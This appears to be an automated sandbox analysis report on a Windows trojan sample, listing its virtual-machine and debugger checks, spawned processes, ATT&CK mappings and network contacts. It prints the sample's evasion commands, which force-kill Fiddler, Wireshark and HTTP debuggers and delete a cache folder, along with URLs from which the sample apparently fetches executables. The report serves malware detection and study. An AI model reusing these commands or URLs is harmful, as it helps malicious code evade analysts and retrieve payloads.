Source: Amcache.hve.38.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.38.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.38.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.38.drBinary or memory string: vmci.sys
Source: Amcache.hve.38.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.38.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.38.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.38.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: Amcache.hve.38.drBinary or memory string: VMware20,1
Source: Amcache.hve.38.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.38.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.38.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.38.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.38.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.38.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.38.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.38.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.38.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.38.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.38.drBinary or memory string: vmci.inf_amd64_68ed49469341f563

Anti Debugging

barindex
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-47619
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3FD4C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5A3FD4C
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A400E8 memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF7E5A400E8
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A08660 GetModuleHandleA,GetProcAddress,strpbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,0_2_00007FF7E5A08660
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3FEF4 SetUnhandledExceptionFilter,0_2_00007FF7E5A3FEF4
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3FD4C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5A3FD4C
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3F9F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E5A3F9F4
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3FF64 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7E5A3FF64
Source: Amcache.hve.38.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.38.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.38.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.38.drBinary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A14A60 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,memcmp,closesocket,closesocket,closesocket,closesocket,0_2_00007FF7E5A14A60
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A07630 memset,strncmp,strncmp,strchr,htons,atoi,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,0_2_00007FF7E5A07630
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A2B750 calloc,calloc,calloc,bind,WSAGetLastError,0_2_00007FF7E5A2B750
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A2B4F1 calloc,calloc,calloc,bind,WSAGetLastError,0_2_00007FF7E5A2B4F1
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A249F0 calloc,strchr,strncpy,strchr,strncpy,strchr,strtoul,strchr,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,0_2_00007FF7E5A249F0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Windows Service
1
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
1
Exploitation of Remote Services
12
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
11
Virtualization/Sandbox Evasion
LSASS Memory141
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager11
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS3
System Information Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538234 Sample: oMBUxRQ4cj.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 60 35 keyauth.win 2->35 41 Multi AV Scanner detection for submitted file 2->41 43 Machine Learning detection for sample 2->43 45 AI detected suspicious sample 2->45 8 oMBUxRQ4cj.exe 1 2->8         started        signatures3 process4 dnsIp5 37 keyauth.win 104.26.0.5, 443, 49708 CLOUDFLARENETUS United States 8->37 39 127.0.0.1 unknown unknown 8->39 47 Found API chain indicative of debugger detection 8->47 12 WerFault.exe 19 16 8->12         started        15 cmd.exe 1 8->15         started        17 cmd.exe 1 8->17         started        19 17 other processes 8->19 signatures6 process7 file8 33 C:\ProgramData\Microsoft\...\Report.wer, Unicode 12->33 dropped 21 taskkill.exe 1 15->21         started        23 sc.exe 1 17->23         started        25 taskkill.exe 1 19->25         started        27 taskkill.exe 1 19->27         started        29 taskkill.exe 1 19->29         started        31 10 other processes 19->31 process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
oMBUxRQ4cj.exe58%ReversingLabsWin64.Trojan.Lazy
oMBUxRQ4cj.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
keyauth.win
104.26.0.5
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://keyauth.win/api/1.1/false
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://keyauth.win/api/1.1/64oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://185.101.104.122/esphvciforabronkz.exeoMBUxRQ4cj.exefalse
          unknown
          http://185.101.104.122/esphvcionbronkz.exeC:oMBUxRQ4cj.exefalse
            unknown
            http://upx.sf.netAmcache.hve.38.drfalse
            • URL Reputation: safe
            unknown
            https://keyauth.win/api/1.1/umoMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://185.101.104.122/esphvciforabronkz.exeC:oMBUxRQ4cj.exefalse
                unknown
                https://curl.haxx.se/docs/http-cookies.htmloMBUxRQ4cj.exefalse
                • URL Reputation: safe
                unknown
                https://curl.haxx.se/docs/http-cookies.html#oMBUxRQ4cj.exefalse
                  unknown
                  https://keyauth.win/api/1.2/oMBUxRQ4cj.exe, 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmp, oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.101.104.122/esphvcionbronkz.exeoMBUxRQ4cj.exefalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.26.0.5
                      keyauth.winUnited States
                      13335CLOUDFLARENETUSfalse
                      IP
                      127.0.0.1
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1538234
                      Start date and time:2024-10-20 21:09:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 21s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:42
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:oMBUxRQ4cj.exe
                      renamed because original name is a hash value
                      Original Sample Name:be1bc9129a29112cf1d62b178517de03.exe
                      Detection:MAL
                      Classification:mal60.evad.winEXE@68/22@1/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 42
                      • Number of non-executed functions: 236
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.189.173.20
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • VT rate limit hit for: oMBUxRQ4cj.exe
                      TimeTypeDescription
                      15:10:25API Interceptor1x Sleep call for process: WerFault.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.26.0.5SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exeGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.Win64.TrojanX-gen.12317.30120.exeGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.Win64.DropperX-gen.8093.16745.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Win64.MalwareX-gen.7929.18094.exeGet hashmaliciousUnknownBrowse
                                    FREE TEST.exeGet hashmaliciousUnknownBrowse
                                      zara_slotted_cracked.exeGet hashmaliciousUnknownBrowse
                                        1YJgPEJr4V.exeGet hashmaliciousUnknownBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          keyauth.winSecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.72.57
                                          SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          Frozen_Slotted.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.1.5
                                          SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.72.57
                                          SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.TrojanX-gen.12317.30120.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.DropperX-gen.8093.16745.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.DropperX-gen.8093.16745.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.1.5
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUSsims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.75.40
                                          file.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.53.8
                                          file.exeGet hashmaliciousLummaCBrowse
                                          • 172.67.206.204
                                          RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                          • 104.26.12.205
                                          9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 188.114.96.3
                                          WinFIG.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.53.8
                                          WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.53.8
                                          file.exeGet hashmaliciousLummaCBrowse
                                          • 172.67.206.204
                                          SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                          • 172.67.206.204
                                          Download.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.53.8
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eRFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                          • 104.26.0.5
                                          gtIVRm5dHl.htmGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          ojSv9FmOwn.lnkGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          a1OueQJq4d.exeGet hashmaliciousDCRatBrowse
                                          • 104.26.0.5
                                          oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                          • 104.26.0.5
                                          hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                          • 104.26.0.5
                                          N2ER4ZENF1.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          N2ER4ZENF1.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.Evo-gen.14681.29745.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                          • 104.26.0.5
                                          SecuriteInfo.com.Win64.MalwareX-gen.18133.14409.exeGet hashmaliciousDiscord RatBrowse
                                          • 104.26.0.5
                                          No context
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9997635471468678
                                          Encrypted:false
                                          SSDEEP:192:wkVZ6JBIa087bBhjXVmUzuiFNZ24lO8r/:5VZsBIh8HBhjRzuiFNY4lO8r
                                          MD5:65026FE2EBCBA283802F4548630553BD
                                          SHA1:0B6A8381293F2552BDE5CD3322799D7887753146
                                          SHA-256:46BC0C03149EDB2FF0B857295E3117D894785B5022FF05DAA092A1D506006A8B
                                          SHA-512:33FCAC690AA00BD8A58D7F1F6E9E8D3AFB27A0D9E1BDB73980DEB88E2DBAD933F35DD7D1B07962A295CCFB5AA1CE6576E64E5654B4ECBA9DFAB35B6AB13A45DF
                                          Malicious:true
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.9.2.5.0.0.6.3.8.7.8.8.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.9.2.5.0.0.6.8.2.5.3.8.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.d.a.b.1.5.4.-.a.7.1.e.-.4.f.a.1.-.b.2.7.7.-.0.3.f.5.9.e.b.4.9.4.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.2.c.e.6.d.c.-.0.c.0.c.-.4.8.f.7.-.9.a.c.b.-.4.9.0.5.4.1.b.3.d.0.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.o.M.B.U.x.R.Q.4.c.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.5.0.-.0.0.0.1.-.0.0.1.4.-.5.f.e.0.-.b.a.a.8.2.3.2.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.0.e.3.2.1.1.c.0.a.5.c.7.c.7.7.2.6.9.2.f.d.4.a.0.f.7.3.f.3.4.6.0.0.0.0.f.f.f.f.!.0.0.0.0.d.9.3.c.e.3.8.e.2.9.d.5.6.4.3.f.d.d.a.4.d.7.8.6.a.0.1.9.4.f.b.e.d.0.4.c.6.8.b.9.!.o.M.B.U.x.R.Q.4.c.j...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.6.
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Sun Oct 20 19:10:06 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):105668
                                          Entropy (8bit):1.617780144724441
                                          Encrypted:false
                                          SSDEEP:384:39JCtrkh2e0syFkNDDaRuKGhDRTJmr2BCL2FP:3Ogh2e07eNDGRuKGhwS
                                          MD5:E968245385494CB5473E50D44FAB66E3
                                          SHA1:76E07427B8D9ECCEEA2650B594D22F168A44A8AC
